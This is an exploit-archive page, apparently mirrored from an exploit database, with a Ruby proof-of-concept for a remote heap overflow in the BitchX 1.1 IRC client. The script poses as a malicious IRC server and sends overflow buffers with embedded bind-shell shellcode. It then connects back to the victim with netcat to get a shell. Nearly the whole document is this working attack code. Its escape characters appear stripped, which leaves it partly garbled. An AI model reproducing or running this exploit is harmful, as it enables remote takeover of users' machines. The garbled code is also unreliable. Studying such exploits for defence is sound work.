[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BitchX 1.1 Final MODE Remote Heap Overflow Exploit (0-day)
# Published : 2007-08-27
# Author : bannedit
# Previous Title : Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF
# Next Title : NVR SP2 2.0 (nvUtility.dll v. 1.0.14.0) SaveXMLFile() Inscure Method
#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################
require 'socket'
#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit
"x6ax02x58xcdx80x85xc0x74x05x6ax01x58xcdx80"+
#metasploit linux x86 shellcode bind tcp port 4444
"x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xfc"+
"x98xd8xb8x83xebxfcxe2xf4xcdx43x8bxfbxafxf2xdaxd2"+
"x9axc0x41x31x1dx55x58x2exbfxcaxbexd0xedxc4xbexeb"+
"x75x79xb2xdexa4xc8x89xeex75x79x15x38x4cxfex09x5b"+
"x31x18x8axeaxaaxdbx51x59x4cxfex15x38x6fxf2xdaxe1"+
"x4cxa7x15x38xb5xe1x21x08xf7xcaxb0x97xd3xebxb0xd0"+
"xd3xfaxb1xd6x75x7bx8axebx75x79x15x38"
port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)
ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -"
puts "----------------------------------------------"
puts "n[-] listening for incoming clients..."
while (client = sock.accept)
ip = client.peeraddr
buffer = client.gets
puts "[<] #{buffer}"
hostname = ([ret].pack('V')) * 13
nick = "bannedit"
#Fake server reply to connection
buffer = ":#{nick} MODE #{nick} :+iwrn"+
":0 001 #{nick} :biznitch-1.0rn"+
":5 002 #{nick} :biznitch-1.0rn"+
":6 003 #{nick} :arn"+
":aaa 004 #{nick} :arn"+
":aaa 005 #{nick} :arn"+
":aaa 251 #{nick} :arn"+
":aaa 252 #{nick} :arn"+
":aaa 253 #{nick} :arn"+
":aaa 254 #{nick} :arn"+
":aaa 255 #{nick} :arn"+
":aaa 375 #{nick} :arn"+
":aaa 372 #{nick} :arn"+
":aaa 376 #{nick} :arn"
join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}rn"+
":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackersrn"
puts "[>] sending fake server response"
client.send(buffer, 0)
sleep(2)
# client.send(join, 0)
topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200
topic<< ([ret].pack('V')) * 100
topic<< "rn"
for i in 0..20
client.send(topic, 0)
end
puts "[>] sending evil buffer"
evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa"
ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "x90" * (1126 - shellcode.length)
evilbuf<< shellcode
evilbuf<< "x90" * 40
evilbuf<< "rn"
for i in 0..5
client.send(evilbuf, 0)
end
sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...nn"
fork {
system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener"
}
end
# www.Syue.com [2007-08-27]